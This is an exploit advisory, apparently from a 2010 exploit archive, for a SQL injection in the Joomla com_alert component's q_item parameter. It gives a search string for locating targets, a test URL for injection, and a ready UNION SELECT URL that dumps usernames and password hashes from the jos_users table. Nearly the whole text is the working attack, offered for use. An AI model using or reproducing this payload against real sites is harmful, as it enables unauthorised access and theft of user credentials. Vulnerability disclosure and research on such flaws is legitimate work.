# Title: Joomla Component com_alert&q_item SQL Injection Vulnerability
# Author: N2n-Hacker
# Date: 2010-03-17
# Script: Joomla
#########################################################################
#############################################################################################

       **[ Joomla com_alert&q_item Sql Injection Vulnerability ]**

                       N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>


#############################################################################################
#############################################################################################


# Searching = "?option=com_alert"


==> http://www.site.com/Joomla/index.php?option=com_alert&task=item&q_item=1' <== Inject Here Man =)



==> Exploiting = http://www.site.com/Joomla/index.php?option=com_alert&task=item&q_item=-1 union select 1,
concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--


#############################################################################################
    \\\\\\\\\ el zvit o rvit el douzan o ma rah dayer /////////

#############################################################################################
                    el bitton o ma dar fiya
#############################################################################################